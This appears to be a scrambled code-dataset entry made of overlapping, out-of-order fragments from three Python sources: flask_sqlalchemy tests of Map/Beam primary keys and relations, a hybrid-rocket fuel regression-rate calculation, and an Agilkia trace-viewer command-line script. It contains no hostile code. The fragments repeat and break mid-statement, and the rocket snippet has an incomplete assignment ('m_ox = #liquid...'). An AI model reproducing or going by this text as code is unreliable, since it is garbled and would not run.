beam1.map assert beam1 is", "same Python object assert map1 is not map1_ # __________________________________________________________________|| def test_primary_key(app): '''A", "# The foreign key is correctly set assert map1.map_id == beam1.input_map_id with app.app_context():", "relation ''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The relation has", "adding an object ''' with app.app_context(): # save the initial number of the", "map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The relation has been already", "None assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys", "key (map_id) is None at this point assert map1.map_id is None with app.app_context():", "app.app_context(): # The object can be retrived by the map_id in another context", "by the map_id in another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name", "= len(Map.query.all()) # this instantiation doesn't need be within a app context map1", "map=map1) # The relation has been already established assert map1 is beam1.map assert", "sa.session.commit() # The primary keys are assigned assert map1.map_id is not None assert", "= Beam(name=\"beam1\", map=map1) # The relation has been already established assert map1 is", "be retrived by the map_id in another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1'", "are written primarily for the developer to understand # how models in flask_sqlalchemy", "is preserved in a different app context assert map1 is beam1.map assert beam1", "set assert map1.map_id == beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first()", "# the new map can be retrieved in a different app context map1_", "keys are still None assert map1.map_id is None assert beam1.beam_id is None assert", "= map1.map_id assert map_id is not None with app.app_context(): # The object can", "in flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app): '''A simple test of adding an", "primary and foreign keys are still None assert map1.map_id is None assert beam1.beam_id", "# These tests are written primarily for the developer to understand # how", "''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The relation has been", "app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A", "The primary key (map_id) is None at this point assert map1.map_id is None", "longer the same Python object assert map1 is not map1_ # __________________________________________________________________|| def", "The object can be retrived by the map_id in another context map1 =", "map_id in another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' == map1.name # __________________________________________________________________||", "= Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query returns", "[beam1] == map1.beams # The primary and foreign keys are still None assert", "an object ''' with app.app_context(): # save the initial number of the maps", "with relation ''' map1 = Map(name=\"map1\") beam1 = Beam(name=\"beam1\", map=map1) # The relation", "a different app context assert map1 is beam1.map assert beam1 is map1.beams[0] assert", "the primary key ''' map1 = Map(name=\"map1\") # The primary key (map_id) is", "map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query", "with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a different app context, no longer", "map1.beams # The primary and foreign keys are still None assert map1.map_id is", "save the initial number of the maps to compare later nmaps = len(Map.query.all())", "the developer to understand # how models in flask_sqlalchemy work. # __________________________________________________________________|| def", "retrieved in a different app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map) #", "map1 = Map(name=\"map1\") # The primary key (map_id) is None at this point", "app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first() # the query returns the same Python", "sa.session.add(map1) sa.session.commit() # After the commit, map_id is automatically assigned map_id = map1.map_id", "not None # The foreign key is correctly set assert map1.map_id == beam1.input_map_id", "and foreign keys are still None assert map1.map_id is None assert beam1.beam_id is", "Python object ''' map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() map1_ = Map.query.filter_by(name='map1').first()", "the commit, map_id is automatically assigned map_id = map1.map_id assert map_id is not", "in a different app context assert map1 is beam1.map assert beam1 is map1.beams[0]", "be retrieved in a different app context map1_ = Map.query.filter_by(name='map1').first() assert isinstance(map1_, Map)", "same Python object assert map1 is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() #", "The primary keys are assigned assert map1.map_id is not None assert beam1.beam_id is", "is None at this point assert map1.map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit()", "flask_sqlalchemy work. # __________________________________________________________________|| def test_simple(app): '''A simple test of adding an object", "sa.session.add(map1) sa.session.commit() with app.app_context(): # test the number of the maps is increased", "not None assert beam1.beam_id is not None # The foreign key is correctly", "# __________________________________________________________________|| def test_relation(app): '''A simple test of adding an object with relation", "with app.app_context(): # The object can be retrived by the map_id in another", "within a app context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit() with app.app_context():", "assert isinstance(map1_, Map) # __________________________________________________________________|| def test_python_object(app): '''A simple test about Python object", "still None assert map1.map_id is None assert beam1.beam_id is None assert beam1.input_map_id is", "assert map1.map_id is not None assert beam1.beam_id is not None # The foreign", "None with app.app_context(): # The object can be retrived by the map_id in", "retrived by the map_id in another context map1 = Map.query.filter_by(map_id=map_id).first() assert 'map1' ==", "is None with app.app_context(): sa.session.add(map1) sa.session.commit() # After the commit, map_id is automatically", "assert map1 is beam1.map assert [beam1] == map1.beams # The primary and foreign", "key is correctly set assert map1.map_id == beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first()", "# The object can be retrived by the map_id in another context map1", "is beam1.map assert [beam1] == map1.beams # The primary and foreign keys are", "# After the commit, map_id is automatically assigned map_id = map1.map_id assert map_id", "has been already established assert map1 is beam1.map assert [beam1] == map1.beams #", "with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary keys are assigned assert map1.map_id is", "simple test about the primary key ''' map1 = Map(name=\"map1\") # The primary", "None assert beam1.beam_id is not None # The foreign key is correctly set", "need be within a app context map1 = Map(name=\"map1\") with app.app_context(): sa.session.add(map1) sa.session.commit()", "commit, map_id is automatically assigned map_id = map1.map_id assert map_id is not None", "import Map, Beam # These tests are written primarily for the developer to", "beam1.beam_id is None assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # The", "is None assert beam1.input_map_id is None with app.app_context(): sa.session.add(map1) sa.session.commit() # The primary", "map1_ = Map.query.filter_by(name='map1').first() # In a different app context, no longer the same", "def test_primary_key(app): '''A simple test about the primary key ''' map1 = Map(name=\"map1\")", "map1 is map1_ with app.app_context(): map1_ = Map.query.filter_by(name='map1').first() # In a different app", "''' with app.app_context(): # save the initial number of the maps to compare", "'''A simple test of adding an object with relation ''' map1 = Map(name=\"map1\")", "object ''' with app.app_context(): # save the initial number of the maps to", "map1.map_id == beam1.input_map_id with app.app_context(): map1 = Map.query.filter_by(name='map1').first() beam1 = Beam.query.filter_by(name='beam1').first() # The" ]
[ "= 950 L = 0.3048 #fuel core length CHECK r_fo = 0.068/2 #", "chamber radius a0 = 0.000155 # Regression rate coeff (m/s**2) n_reg = 0.5", "w = initial fuel web thickness n = n + dn*dt # consume", "ox r_port = r_fo - w #fuel port radius; r_fo = inner combustion", "n = n + dn*dt # consume moles of ox m_f[i+1] = rho_fuel*L*np.pi*w*(2*r_fo-w)", "N2O (kg/kmol) m_ox = #liquid ox mass in tank initial n = m_ox/MW_ox", "n_reg = 0.5 # Regression rate exponent, FLUX EXP??? MW_ox = 44.013 #", "(kg/kmol) m_ox = #liquid ox mass in tank initial n = m_ox/MW_ox #", "fuel web thickness n = n + dn*dt # consume moles of ox", "MW_ox = 44.013 # Molecular weight/mass of N2O (kg/kmol) m_ox = #liquid ox", "#ox mass flux reg_rate = a0*G_ox**n_reg # n_reg = reg. rate exp.; a0", "w = w - reg_rate*dt # w = initial fuel web thickness n", "core length CHECK r_fo = 0.068/2 # Inner combustion chamber radius a0 =", "0.000155 # Regression rate coeff (m/s**2) n_reg = 0.5 # Regression rate exponent,", "n_reg = reg. rate exp.; a0 = reg. rate coeff. w = w", "rate exp.; a0 = reg. rate coeff. w = w - reg_rate*dt #", "FLUX EXP??? MW_ox = 44.013 # Molecular weight/mass of N2O (kg/kmol) m_ox =", "thickness n = n + dn*dt # consume moles of ox m_f[i+1] =", "# Inner combustion chamber radius a0 = 0.000155 # Regression rate coeff (m/s**2)", "reg_rate = a0*G_ox**n_reg # n_reg = reg. rate exp.; a0 = reg. rate", "<gh_stars>1-10 rho_fuel = 950 L = 0.3048 #fuel core length CHECK r_fo =", "= #liquid ox mass in tank initial n = m_ox/MW_ox # moels of", "G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg # n_reg = reg.", "- w #fuel port radius; r_fo = inner combustion chamber radius G_ox =", "initial fuel web thickness n = n + dn*dt # consume moles of", "a0 = reg. rate coeff. w = w - reg_rate*dt # w =", "combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg #", "n = m_ox/MW_ox # moels of liquid ox r_port = r_fo - w", "initial n = m_ox/MW_ox # moels of liquid ox r_port = r_fo -", "# Regression rate exponent, FLUX EXP??? MW_ox = 44.013 # Molecular weight/mass of", "Molecular weight/mass of N2O (kg/kmol) m_ox = #liquid ox mass in tank initial", "radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg # n_reg =", "= 0.3048 #fuel core length CHECK r_fo = 0.068/2 # Inner combustion chamber", "in tank initial n = m_ox/MW_ox # moels of liquid ox r_port =", "r_fo - w #fuel port radius; r_fo = inner combustion chamber radius G_ox", "flux reg_rate = a0*G_ox**n_reg # n_reg = reg. rate exp.; a0 = reg.", "reg. rate coeff. w = w - reg_rate*dt # w = initial fuel", "# Regression rate coeff (m/s**2) n_reg = 0.5 # Regression rate exponent, FLUX", "= inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate =", "chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg # n_reg", "= reg. rate coeff. w = w - reg_rate*dt # w = initial", "= initial fuel web thickness n = n + dn*dt # consume moles", "# n_reg = reg. rate exp.; a0 = reg. rate coeff. w =", "r_fo = inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate", "= reg. rate exp.; a0 = reg. rate coeff. w = w -", "reg. rate exp.; a0 = reg. rate coeff. w = w - reg_rate*dt", "= w - reg_rate*dt # w = initial fuel web thickness n =", "= n + dn*dt # consume moles of ox m_f[i+1] = rho_fuel*L*np.pi*w*(2*r_fo-w) #", "exp.; a0 = reg. rate coeff. w = w - reg_rate*dt # w", "0.068/2 # Inner combustion chamber radius a0 = 0.000155 # Regression rate coeff", "rate exponent, FLUX EXP??? MW_ox = 44.013 # Molecular weight/mass of N2O (kg/kmol)", "950 L = 0.3048 #fuel core length CHECK r_fo = 0.068/2 # Inner", "0.5 # Regression rate exponent, FLUX EXP??? MW_ox = 44.013 # Molecular weight/mass", "m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg # n_reg = reg. rate exp.;", "+ dn*dt # consume moles of ox m_f[i+1] = rho_fuel*L*np.pi*w*(2*r_fo-w) # mass fuel", "port radius; r_fo = inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass", "mass in tank initial n = m_ox/MW_ox # moels of liquid ox r_port", "(m/s**2) n_reg = 0.5 # Regression rate exponent, FLUX EXP??? MW_ox = 44.013", "m_ox/MW_ox # moels of liquid ox r_port = r_fo - w #fuel port", "Regression rate coeff (m/s**2) n_reg = 0.5 # Regression rate exponent, FLUX EXP???", "a0 = 0.000155 # Regression rate coeff (m/s**2) n_reg = 0.5 # Regression", "44.013 # Molecular weight/mass of N2O (kg/kmol) m_ox = #liquid ox mass in", "rho_fuel = 950 L = 0.3048 #fuel core length CHECK r_fo = 0.068/2", "w #fuel port radius; r_fo = inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2)", "moels of liquid ox r_port = r_fo - w #fuel port radius; r_fo", "- reg_rate*dt # w = initial fuel web thickness n = n +", "combustion chamber radius a0 = 0.000155 # Regression rate coeff (m/s**2) n_reg =", "#fuel port radius; r_fo = inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox", "L = 0.3048 #fuel core length CHECK r_fo = 0.068/2 # Inner combustion", "rate coeff (m/s**2) n_reg = 0.5 # Regression rate exponent, FLUX EXP??? MW_ox", "radius a0 = 0.000155 # Regression rate coeff (m/s**2) n_reg = 0.5 #", "reg_rate*dt # w = initial fuel web thickness n = n + dn*dt", "= 0.068/2 # Inner combustion chamber radius a0 = 0.000155 # Regression rate", "CHECK r_fo = 0.068/2 # Inner combustion chamber radius a0 = 0.000155 #", "ox mass in tank initial n = m_ox/MW_ox # moels of liquid ox", "mass flux reg_rate = a0*G_ox**n_reg # n_reg = reg. rate exp.; a0 =", "weight/mass of N2O (kg/kmol) m_ox = #liquid ox mass in tank initial n", "of N2O (kg/kmol) m_ox = #liquid ox mass in tank initial n =", "= 0.000155 # Regression rate coeff (m/s**2) n_reg = 0.5 # Regression rate", "coeff (m/s**2) n_reg = 0.5 # Regression rate exponent, FLUX EXP??? MW_ox =", "#fuel core length CHECK r_fo = 0.068/2 # Inner combustion chamber radius a0", "# moels of liquid ox r_port = r_fo - w #fuel port radius;", "= r_fo - w #fuel port radius; r_fo = inner combustion chamber radius", "radius; r_fo = inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux", "Regression rate exponent, FLUX EXP??? MW_ox = 44.013 # Molecular weight/mass of N2O", "EXP??? MW_ox = 44.013 # Molecular weight/mass of N2O (kg/kmol) m_ox = #liquid", "= m_ox/MW_ox # moels of liquid ox r_port = r_fo - w #fuel", "0.3048 #fuel core length CHECK r_fo = 0.068/2 # Inner combustion chamber radius", "# Molecular weight/mass of N2O (kg/kmol) m_ox = #liquid ox mass in tank", "= 0.5 # Regression rate exponent, FLUX EXP??? MW_ox = 44.013 # Molecular", "inner combustion chamber radius G_ox = m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg", "r_fo = 0.068/2 # Inner combustion chamber radius a0 = 0.000155 # Regression", "#liquid ox mass in tank initial n = m_ox/MW_ox # moels of liquid", "tank initial n = m_ox/MW_ox # moels of liquid ox r_port = r_fo", "a0*G_ox**n_reg # n_reg = reg. rate exp.; a0 = reg. rate coeff. w", "coeff. w = w - reg_rate*dt # w = initial fuel web thickness", "# w = initial fuel web thickness n = n + dn*dt #", "rate coeff. w = w - reg_rate*dt # w = initial fuel web", "= a0*G_ox**n_reg # n_reg = reg. rate exp.; a0 = reg. rate coeff.", "r_port = r_fo - w #fuel port radius; r_fo = inner combustion chamber", "web thickness n = n + dn*dt # consume moles of ox m_f[i+1]", "m_ox = #liquid ox mass in tank initial n = m_ox/MW_ox # moels", "Inner combustion chamber radius a0 = 0.000155 # Regression rate coeff (m/s**2) n_reg", "w - reg_rate*dt # w = initial fuel web thickness n = n", "length CHECK r_fo = 0.068/2 # Inner combustion chamber radius a0 = 0.000155", "of liquid ox r_port = r_fo - w #fuel port radius; r_fo =", "= m_dot_ox[i]/(np.pi*r_port**2) #ox mass flux reg_rate = a0*G_ox**n_reg # n_reg = reg. rate", "liquid ox r_port = r_fo - w #fuel port radius; r_fo = inner", "= 44.013 # Molecular weight/mass of N2O (kg/kmol) m_ox = #liquid ox mass", "n + dn*dt # consume moles of ox m_f[i+1] = rho_fuel*L*np.pi*w*(2*r_fo-w) # mass", "exponent, FLUX EXP??? MW_ox = 44.013 # Molecular weight/mass of N2O (kg/kmol) m_ox" ]
[ "help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status red,", "summary of each trace, plus some general statistics. If the TraceSet is clustered,", ": {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number", "specify the 'Ok' status value (e.g. --ok=200 for HTTP results) @author: <EMAIL> \"\"\"", "without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color", "df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number of", "-*- coding: utf-8 -*- \"\"\" View the traces within an Agilkia TraceSet. It", "columns: 0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\",", "ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0,", "{len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count()", "It prints a one-line summary of each trace, plus some general statistics. If", "\")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1:", "and not args.noclusters: clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for", "tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"====", "line program that prints a set of traces, plus some summary statistics.\"\"\" parser", "trace (plus one extra space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet", "= pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err", "in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df = traceset.to_pandas() statuses =", "pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table of Actions showing how many got", "in clusters, by default. TODO: allow user to specify the 'Ok' status value", "statistics. If the TraceSet is clustered, traces will be displayed in clusters, by", "in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\",", "= agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we", "parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events", "1: print(f\"Categories of errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \" \")) if", "{action:20s} {ch}\") print(\"==== statistics ====\") df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok =", "general statistics. If the TraceSet is clustered, traces will be displayed in clusters,", "statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as the", "{ch}\") print(\"==== statistics ====\") df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0", "add Totals row at bottom return pd.concat([data, totals]) def main(): \"\"\"A command line", "(i, tr) in enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for", "of traces : {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters :", "to specify the 'Ok' status value (e.g. --ok=200 for HTTP results) @author: <EMAIL>", "a set of traces, plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\",", "print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars ====\") ev_chars = traceset.get_event_chars() for", "allow user to specify the 'Ok' status value (e.g. --ok=200 for HTTP results)", "{percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of errors : ({100.0", "more information, such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file", "good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals =", "= \" \" # prefix for each trace (plus one extra space) def", "pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom return pd.concat([data, totals]) def main(): \"\"\"A", "help=\"color events with non-zero status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the", "status value (e.g. --ok=200 for HTTP results) @author: <EMAIL> \"\"\" import pandas as", "event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an event-to-char map.\") parser.add_argument(\"-n\",", "status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that represents", "\"\"\"From TraceSet DataFrame, creates a table of Actions showing how many got Ok", "pandas as pd import argparse from pathlib import Path import textwrap import agilkia", "traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\")", "clusters : {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\")", "data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom return pd.concat([data, totals])", "(e.g. --ok=200 for HTTP results) @author: <EMAIL> \"\"\" import pandas as pd import", "\" # prefix for each trace (plus one extra space) def make_action_status_table(df: pd.DataFrame,", "is None else [args.repeats] if traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters() for", "parser.add_argument(\"--ok\", help=\"specify the status value that represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int)", "main(): \"\"\"A command line program that prints a set of traces, plus some", "file (*.json)\") args = parser.parse_args() # print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions", "that represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file", "\"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status", "args.verbose: print(\"==== event chars ====\") ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\"", "mapfile = pd.read_csv(args.eventchars, header=None) # we assume this has just two columns: 0=action_name", "actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we assume this", "containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\",", "Ok vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size()", "(default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args =", "TraceSet. It prints a one-line summary of each trace, plus some general statistics.", "that prints a set of traces, plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__,", "if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we assume this has just two", "= 100.0 * statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number of traces :", "for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df = traceset.to_pandas()", "for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces): if clusters[i]", "/ df.shape[0] # print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace length :", "event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress", "= parser.parse_args() # print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if", "tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars ====\") ev_chars", "\" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) >", "the 'Ok' status value (e.g. --ok=200 for HTTP results) @author: <EMAIL> \"\"\" import", "prints a set of traces, plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)", "parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces", "information, such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing", "one extra space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates", "-> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table of Actions showing how many", "and 1=char. char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map)", "len(error_counts) > 1: print(f\"Categories of errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \"", "of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number of event kinds:", "tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars ====\") ev_chars = traceset.get_event_chars() for action,ch", "ok=args.ok)), \" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts)", "parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args = parser.parse_args() # print(f\"Args are:\", args)", "some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such", "each trace (plus one extra space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From", "in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars ====\") ev_chars =", "downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row", "# print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile", "statuses = df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0) / df.shape[0] # print(df.head())", "a table of Actions showing how many got Ok vs Error.\"\"\" good =", "= df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number", "color_status=args.status)) if args.verbose: print(\"==== event chars ====\") ev_chars = traceset.get_event_chars() for action,ch in", "events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status red, to highlight", "print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number of event", "import Path import textwrap import agilkia INDENT = \" \" # prefix for", "two columns: 0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given", "= df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of errors : ({100.0 - percent_ok:.2f}%", "some general statistics. If the TraceSet is clustered, traces will be displayed in", "ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\")", "table of Actions showing how many got Ok vs Error.\"\"\" good = df[df.Status", "== c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status))", "Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data =", ": ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \" \")) if __name__ == \"__main__\": main()", "pathlib import Path import textwrap import agilkia INDENT = \" \" # prefix", "= dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\",", "df.shape[0] # print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\")", "Path import textwrap import agilkia INDENT = \" \" # prefix for each", "= [] if args.repeats is None else [args.repeats] if traceset.is_clustered() and not args.noclusters:", "tr) in enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr", "success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args", "<EMAIL> \"\"\" import pandas as pd import argparse from pathlib import Path import", "represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\")", "print(\"==== statistics ====\") df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0 *", "an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\",", "as pd import argparse from pathlib import Path import textwrap import agilkia INDENT", "traces will be displayed in clusters, by default. TODO: allow user to specify", "file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\")", "trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events :", "args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we assume this has just two columns:", "Agilkia traceset file (*.json)\") args = parser.parse_args() # print(f\"Args are:\", args) 